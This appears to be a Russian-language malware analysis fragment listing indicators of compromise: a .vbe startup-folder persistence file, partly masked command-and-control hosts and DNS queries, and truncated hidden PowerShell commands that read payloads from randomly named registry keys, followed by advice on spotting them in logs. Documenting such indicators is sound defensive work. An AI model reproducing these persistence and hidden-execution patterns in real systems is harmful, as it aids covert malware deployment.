Техническая информация
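- %APPDATA%\microsoft\windows\start menu\programs\startup\mastrs.vbe (файл в папке автозагрузки пользователя: запускается при каждом входе этого пользователя в систему)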
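- 'de####r.ddns.com.br':5552 (узел:порт; часть имени узла замаскирована символами ####)
- 'in####ndent.co.uk':443 (узел:порт; часть имени узла замаскирована символами ####)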
- DNS ASK de####r.ddns.com.br (DNS-запрос этого имени)
- DNS ASK in####ndent.co.uk (DNS-запрос этого имени)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -noprofile -Command "$QoEsNOQpR = (get-itemproperty -path 'HKCU:\KJtiLVBXHVboNSeryEeDVdavDUnJAvIBtfFBFzMbbsp\TDEVnOPoebtDN...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -noprofile -Command "$FuNSoNWGyhvKKWWCDpbcsKrCAbhFDDyahBySvoo = (get-itemproperty -path 'HKCU:\uFaVNHpCebiR\wUAVQWGABrUcsi...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -noprofile -Command "$QoEsNOQpR = (get-itemproperty -path 'HKCU:\KJtiLVBXHVboNSeryEeDVdavDUnJAvIBtfFBFzMbbsp\TDEVnOPoebtDN...
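- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -noprofile -Command "$FuNSoNWGyhvKKWWCDpbcsKrCAbhFDDyahBySvoo = (get-itemproperty -path 'HKCU:\uFaVNHpCebiR\wUAVQWGABrUcsi...
Примечание: командные строки PowerShell выше обрезаны («...»). По видимой части powershell.exe запускается со скрытым окном (-windowstyle hidden), без профиля (-noprofile) и с -ExecutionPolicy UnRestricted и читает значение из ключа HKCU со случайным на вид именем; что делается с этим значением дальше, на странице не показано. Такие запуски стоит искать в журналах создания процессов, а указанные ключи реестра — проверять при разборе инцидента.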